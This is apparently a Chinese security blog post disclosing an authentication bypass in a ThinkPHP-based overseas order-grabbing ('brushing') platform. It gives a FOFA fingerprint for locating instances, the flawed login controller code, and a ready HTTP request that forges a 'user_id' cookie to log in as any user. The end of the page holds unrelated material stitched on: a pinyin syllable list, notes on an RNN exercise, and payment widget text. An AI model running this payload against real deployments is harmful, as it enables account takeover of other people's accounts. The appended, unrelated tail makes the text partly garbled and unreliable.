某二开版海外抢单Shua单系统存在任意用户登录漏洞

简单描述

源码简介: 二开版海外抢单Shua单系统/用户风险值/叠加组/打针/订单自动匹配系统,此套别人二开的海外抢单Shua单系统,新增用户风险值、最后做单时间,带三级分销,权限代理后台,充值提现优先完美后台查询功能

 fofa

"/red/popper.min.js"

框架:ThinkPHP 5.1.41 Debug:True 默认后台:/admin/login

主要是美国用户多一些

漏洞分析

位于 /index/controller/Base.php 控制器的 __construct 方法作为验证登录控制器,来验证用户是否登录,然而这套系统实际采用两套验证用户的方法,Session和Cookie并存

其中 if (!$uid) { $uid = cookie('user_id'); } 这句话是关键,如果Session中没有发现user_id,那么直接验证Cookie中的user_id,而Cookie是可以伪造的,这里导致漏洞产生


/**
* 验证登录控制器
*/
class Base extends Controller
{
  protected $rule = ['__token__' => 'token'];
  protected $msg = ['__token__' => '无效token!'];
  protected $_uid;

  function __construct(App $app)
{
    parent::__construct($app);
    if (config('shop_status') == 0) exit();
    $uid = session('user_id');
    if (!$uid) {
      $uid = cookie('user_id');
    }
    //echo App::VERSION;exit;
    /*if (request()->subDomain() == 'cs' || request()->subDomain() == '') {
    header('Location:' . 'https://www.' . \request()->rootDomain());
    exit();
  }*/
    $controller = strtolower(\request()->controller());
    if ($controller == 'user') return;

    if (!$uid && request()->isPost()) {
      $this->error(lang('no_login'));
    }
    if (!$uid) $this->redirect('User/login');
    $this->_uid = $uid;
  }
}

 漏洞复现

Payload:


GET /index/index HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 73
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: user_id=1
Host: 127.0.0.1:81
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
User-Token-Csrf: csrf66e28d7ebbffa
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

 

 来自星悦安全公众号

拼音数据(无声调):a ai an ang ao ba bai ban bang bao bei ben beng bi bian biao bie bin bing bo bu ca cai can cang cao ce cen ceng cha chai chan chang chao che chen cheng chi chong chou chu chua chuai chuan chuang chui chun chuo ci cong cou cu cuan cui cun cuo da dai dan dang dao de den dei deng di dia dian diao die ding diu dong dou du duan dui dun duo e ei en eng er fa fan fang fei fen feng fo fou fu ga gai gan gang gao ge gei gen geng gong gou gu gua guai guan guang gui gun guo ha hai han hang hao he hei hen heng hong hou hu hua huai huan huang hui hun huo ji jia jian jiang jiao jie jin jing jiong jiu ju juan jue jun ka kai kan kang kao ke ken keng kong kou ku kua kuai kuan kuang kui kun kuo la lai lan lang lao le lei leng li lia lian liang liao lie lin ling liu long lou lu lü luan lue lüe lun luo ma mai man mang mao me mei men meng mi mian miao mie min ming miu mo mou mu na nai nan nang nao ne nei nen neng ng ni nian niang niao nie nin ning niu nong nou nu nü nuan nüe nuo nun ou pa pai pan pang pao pei pen peng pi pian piao pie pin ping po pou pu qi qia qian qiang qiao qie qin qing qiong qiu qu quan que qun ran rang rao re ren reng ri rong rou ru ruan rui run ruo sa sai san sang sao se sen seng sha shai shan shang shao she shei shen sheng shi shou shu shua shuai shuan shuang shui shun shuo si song sou su suan sui sun suo ta tai tan tang tao te teng ti tian tiao tie ting tong tou tu tuan tui tun tuo 定义数据集:采用字符模型,因此一个字符为一个样本。每个样本采用one-hot编码。 样本是时间相关的,分别实现序列的随机采样和序列的顺序划分 标签Y与X同形状,但时间超前1 准备数据:一次梯度更新使用的数据形状为:(时间步,Batch,类别数) 实现基本循环神经网络模型 循环元为nn.RNN或GRU 输出层的全连接使用RNN所有时间步的输出 隐状态初始值为0 测试前向传播 如果采用顺序划分,需梯度截断 训练:损失函数为平均交叉熵 预测:给定一个前缀,进行步预测和K步预测
05-26
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值